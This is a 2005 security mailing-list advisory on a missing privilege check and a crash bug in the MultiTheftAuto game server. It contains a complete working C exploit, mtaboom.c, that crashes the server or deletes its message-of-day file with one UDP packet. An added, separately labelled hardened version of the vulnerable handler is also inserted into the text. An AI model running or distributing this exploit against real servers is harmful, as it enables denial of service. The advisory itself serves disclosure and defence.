[NEWS] MultiTheftAuto Privileges Escalation and DoS Vulnerabilities

From: SecuriTeam (support_at_securiteam.com)
Date: 09/26/05

    To: list@securiteam.com
    Date: 26 Sep 2005 11:08:47 +0200


    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      MultiTheftAuto Privileges Escalation and DoS Vulnerabilities
    ------------------------------------------------------------------------

    SUMMARY

    MultiTheftAuto (MTA) is a closed-source mod and server for the games
    <http://www.rockstargames.com/grandtheftauto3/> Grand Theft Auto III and
    <http://www.rockstargames.com/vicecity/pc/> Grand Theft Auto: Vice City
    which adds multiplayer capabilities to them.

    MultiTheftAuto does not check privileges for a command that allows
    attackers to overwrite information and cause a DoS.

    DETAILS

    Vulnerable Systems:
     * MultiTheftAuto version 0.5 patch 1 and prior

    Privileges Escalation:
    The MTA server has the remote administration option enabled by default.
    The problem is the existence of an undocumented command (number 40) which
    allows the modification or the deletion of the content of the motd.txt
    file used for the message of the day.
    This is the only command which doesn't check if the client is an
    administrator so anyone without permissions has access to it.

    Denial of Service:
    Command 40 is also the cause of another problem, located in the same
    function, which seems incomplete or experimental, as shown by the following
    "retrieved" code:
        // open file for writing "w"
        length = *(u_int *)(src - (src % 4096));
        for(i = j = 0; i < length; i++) {
            if(src[i] == '\n') dst[j++] = '\r';
            dst[j++] = src[i];
            if(j < 1024) continue;
            if(!WriteFile(...)) break;
            j = 0;
        }
        // close file

    length is -1, so the function starts an almost endless loop which stops only
    when the source pointer reaches an unallocated zone of memory. The result is
    the immediate crash of the MTA server.

    It seems that only the Windows server is affected by the crash, because on
    Linux the function is replaced with the following "still incorrect"
    instruction, which doesn't produce exceptions:
        fd = fopen("motd.txt", "w");
        fwrite(data + 4, 1, data, fd); // yes data is the buffer
        fclose(fd);
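    The following is an added example (not code from the advisory, from MTA, or from the author) showing a hardened shape for the motd write path that addresses both findings: the administrator check is applied to every command, including 40, and the LF-to-CRLF conversion is bounded by the packet length actually received instead of a length word read from memory next to the buffer. Command id 40 comes from the advisory; the packet layout (command byte followed by payload), the result codes and the size limit are assumptions made for this example.

```c
#include <stddef.h>
#include <string.h>

/* Assumed for this example: the command id (40 is from the advisory) and a
 * constructed upper bound for the on-disk motd. */
#define CMD_MOTD_WRITE 40
#define MOTD_MAX       1024

enum { RC_OK = 0, RC_DENIED = -1, RC_BAD_LENGTH = -2,
       RC_TOO_LARGE = -3, RC_UNKNOWN_CMD = -4 };

/* Convert LF to CRLF without reading past src_len or writing past dst_cap.
 * Returns the number of bytes written to dst, or RC_TOO_LARGE if the converted
 * text would not fit. The vulnerable loop trusted a length word found next to
 * the buffer (-1 in practice), so it ran until it hit unmapped memory. */
long motd_lf_to_crlf(const unsigned char *src, size_t src_len,
                     unsigned char *dst, size_t dst_cap) {
    size_t i, j = 0;
    for (i = 0; i < src_len; i++) {
        size_t need = (src[i] == '\n') ? 2 : 1;
        if (dst_cap - j < need) return RC_TOO_LARGE;
        if (src[i] == '\n') dst[j++] = '\r';
        dst[j++] = src[i];
    }
    return (long)j;
}

/* Dispatch one remote-administration packet. 'len' is the byte count returned
 * by recvfrom(), the only size the server can trust. The admin check runs
 * before any command is interpreted, so no command can bypass it. The
 * converted motd is written to motd_out instead of straight to motd.txt so
 * that the caller decides when (and whether) to touch the file. */
long handle_admin_packet(const unsigned char *pkt, size_t len,
                         int client_is_admin,
                         unsigned char *motd_out, size_t motd_cap) {
    if (len < 1) return RC_BAD_LENGTH;            /* no command byte */
    if (!client_is_admin) return RC_DENIED;       /* no per-command exceptions */
    if (pkt[0] != CMD_MOTD_WRITE) return RC_UNKNOWN_CMD; /* others omitted */

    size_t payload_len = len - 1;                 /* bytes after the command id */
    if (payload_len > MOTD_MAX) return RC_TOO_LARGE;
    /* A bare command byte (like the one-byte BOOM packet) is an empty motd,
     * which is handled as zero bytes rather than as a runaway read. */
    return motd_lf_to_crlf(pkt + 1, payload_len, motd_out, motd_cap);
}
```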

    Exploit:
    winerr.h can be found at:
    http://www.securiteam.com/unixfocus/5UP0I1FC0Y.html

    mtaboom.c:
    /*

    by Luigi Auriemma

    */

    #include <stdio.h>
    #include <stdlib.h>

    #ifdef WIN32
        #include <winsock.h>
        #include "winerr.h"

        #define close closesocket
        #define ONESEC 1000
    #else
        #include <unistd.h>
        #include <sys/socket.h>
        #include <sys/types.h>
        #include <arpa/inet.h>
        #include <netinet/in.h>
        #include <netdb.h>

        #define ONESEC 1
    #endif

    #define VER "0.1"
    #define BUFFSZ 4096
    #define PORT 4003
    #define TIMEOUT 3
    #define PING "\x0d\x30\x00" // not a ping, just a way to get a reply
    #define BOOM "\x28" // that's enough

    int timeout(int sock);
    u_int resolv(char *host);
    void std_err(void);

    int main(int argc, char *argv[]) {
        struct sockaddr_in peer;
        int sd,
                len;
        u_short port = PORT;
        u_char buff[BUFFSZ];

    #ifdef WIN32
        WSADATA wsadata;
        WSAStartup(MAKEWORD(1,0), &wsadata);
    #endif

        setbuf(stdout, NULL);

        fputs("\n"
            "MultiTheftAuto <= 0.5 patch 1 server crash/motd reset "VER"\n"
            "by Luigi Auriemma\n"
            "e-mail: aluigi@autistici.org\n"
            "web: http://aluigi.altervista.org\n"
            "\n", stdout);

        if(argc < 2) {
            printf("\n"
                "Usage: %s <host> [port(%hu)]\n"
                "\n", argv[0], port);
            exit(1);
        }

        if(argc > 2) port = atoi(argv[2]);
        peer.sin_addr.s_addr = resolv(argv[1]);
        peer.sin_port = htons(port);
        peer.sin_family = AF_INET;

        printf("- target %s : %hu\n",
            inet_ntoa(peer.sin_addr), port);

        sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
        if(sd < 0) std_err();

        fputs("- check server:\n", stdout);
        if(sendto(sd, PING, sizeof(PING) - 1, 0, (struct sockaddr *)&peer,
          sizeof(peer)) < 0) std_err();
        if(timeout(sd) < 0) {
            fputs("\n"
                "Error: the server doesn't seem to support remote administration\n"
                " try using the port 24003\n"
                "\n", stdout);
            exit(1);
        }
        len = recvfrom(sd, buff, BUFFSZ, 0, NULL, NULL);
        if(len < 0) std_err();

        sleep(ONESEC);

        fputs("- send BOOM packet:\n", stdout);
        if(sendto(sd, BOOM, sizeof(BOOM) - 1, 0, (struct sockaddr *)&peer,
          sizeof(peer)) < 0) std_err();

        sleep(ONESEC);

        fputs("- check server:\n", stdout);
        if(sendto(sd, PING, sizeof(PING) - 1, 0, (struct sockaddr *)&peer,
          sizeof(peer)) < 0) std_err();
        if(timeout(sd) < 0) {
            fputs("\nServer IS vulnerable!!!\n\n", stdout);
        } else {
            fputs("\nServer doesn't seem to crash but probably you have "
                "deleted its motd.txt file\n\n", stdout);
        }

        close(sd);
        return(0);
    }

    int timeout(int sock) {
        struct timeval tout;
        fd_set fd_read;
        int err;

        tout.tv_sec = TIMEOUT;
        tout.tv_usec = 0;
        FD_ZERO(&fd_read);
        FD_SET(sock, &fd_read);
        err = select(sock + 1, &fd_read, NULL, NULL, &tout);
        if(err < 0) std_err();
        if(!err) return(-1);
        return(0);
    }

    u_int resolv(char *host) {
        struct hostent *hp;
        u_int host_ip;

        host_ip = inet_addr(host);
        if(host_ip == INADDR_NONE) {
            hp = gethostbyname(host);
            if(!hp) {
                printf("\nError: Unable to resolv hostname (%s)\n\n", host);
                exit(1);
            } else host_ip = *(u_int *)hp->h_addr;
        }
        return(host_ip);
    }

    #ifndef WIN32
        void std_err(void) {
            perror("\nError");
            exit(1);
        }
    #endif

    /* EoF */

    ADDITIONAL INFORMATION

    The information has been provided by Luigi Auriemma (aluigi@autistici.org).
    The original article can be found at:
    http://aluigi.altervista.org/adv/mtaboom-adv.txt

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

